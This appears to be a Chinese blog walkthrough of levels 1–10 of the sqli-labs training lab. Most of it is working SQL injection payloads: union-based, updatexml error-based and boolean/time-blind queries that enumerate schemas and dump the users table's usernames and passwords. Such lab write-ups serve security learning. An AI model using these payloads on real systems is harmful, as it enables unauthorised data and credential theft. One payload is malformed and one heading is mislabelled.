当前位置:   article > 正文

sql-labs通关详解(1-10)

sql-labs通关详解(1-10)

1.less-1

1.判断类型

由此判断是字符型漏洞由单引号闭合。

2.判断 字段个数

http://192.168.190.145/sqli-labs/Less-1/?id=1' order by 3--+

3.获取数据库名

-1' union select 1,2,database()--+

4.获取表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.获取字段名

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

6.获取数据

-1' union select 1,2,group_concat(username,password) from users--+

2.less-2

1.判断类型

数字型。

2.判断字段个数

?id=1 order by 3--+

3.查询当前的数据库名

-1 union select 1,2,database()--+

4.查询数据表

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.查询字段

id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()

6. 获取数据

-1  union select 1,2,group_concat(username,password) from users--+

 3.less-3

1.判断类型

所以是单引号闭合的xx型注入

2.判断字段

2. 查询数据库

-1') union select 1,2,database()--+

3.查询数据表

-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

剩下的查询步骤与前面的题相似。。

4.less-4

1.判断类型

所以为 xx型双引号闭合

其余步骤与上面几道题类似。。

5.less-5

1.判断类型

 

通过测试这道题 查询到数据 会显示  you are in .... ,查询不到就什么也不显示所以判断这道题属于没有回显的题。并且由单引号闭合 先尝试报错注入。

2.报数据库

1' and  updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 3.报数据表

1' and  updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

4.爆字段

-1' and    updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

 5.爆数据

-1' and    updatexml(,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+

6.less-5

1.判断类型 

经过测试这题与less-5类似,没有回显,用报错注入,并且用双引号闭合。 

2.爆数据库 

1" and  updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

3.爆数据表 

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

4.爆字段

1" and  updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

 5.爆数据

1" and  updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)--+

7.less-7

1.判断类型

经过测试发现这道题是没有回显并且单引号闭合,但是输入的测试语句都无效,通过查看源码

提交的参数被')) 闭合 先尝试   报错注入,在尝试盲注..

8.less-8

1.判断类型 

根据测试发是一个单引号闭合的没有回显的题,先尝试报错 ,经过测试报错注入也没有回显所以采用盲注,先采用布尔盲注,不管用再用时间盲注,

由于盲注获取具体数据比较麻烦,我这里给出大概思路,用sqlmap来得到数据

2. 判断数据库长度

1' and  length(database())=8--+

3.判断字符

  1. 0' or ascii(substr(database(),1,1))=115--+
  2. //猜测数据库中的表数量
  3. 0' or 4=(select count(table_name) from information_schema.tables where table_schema=database());--+
  4. //猜测第一个表中的第一个字符
  5. 0' or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
  6. //猜测字段长度
  7. 0' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=2--+
  8. //查第一个字段全名
  9. 0' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))>104--+
  10. //猜测表中字段具体内容的条数
  11. 0' or 8=(select count(id) from security.emails)--+
  12. //查询字段的第一条具体内容
  13. 0' or ascii(substr((select email_id from security.emails limit 0,1),1,1))=68--+

工具使用

1.列出数据库

 

数据表

字段

数据

9.less-9

第九题 不管输入什么都会显示 you are in ... 

是时间注入并且用单引号闭合

工具使用同上一题

判断语句

if(条件,sleep(5),0),条件出可用布尔盲注的语句替换,如果成功就执行sleep(5).

10.less-10

同第九题不过是双引号闭合

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/555581
推荐阅读
相关标签
  

闽ICP备14008679号